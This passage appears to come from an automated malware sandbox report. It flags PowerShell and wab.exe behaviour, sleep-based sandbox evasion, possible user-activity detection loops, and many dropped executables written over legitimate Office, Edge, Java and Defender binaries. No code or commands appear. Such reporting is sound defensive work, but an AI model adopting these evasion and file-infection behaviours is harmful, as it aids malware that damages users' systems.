Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4423 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5401 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6060 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3771 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Windows\svchost.com Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\chrome.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe Jump to dropped file
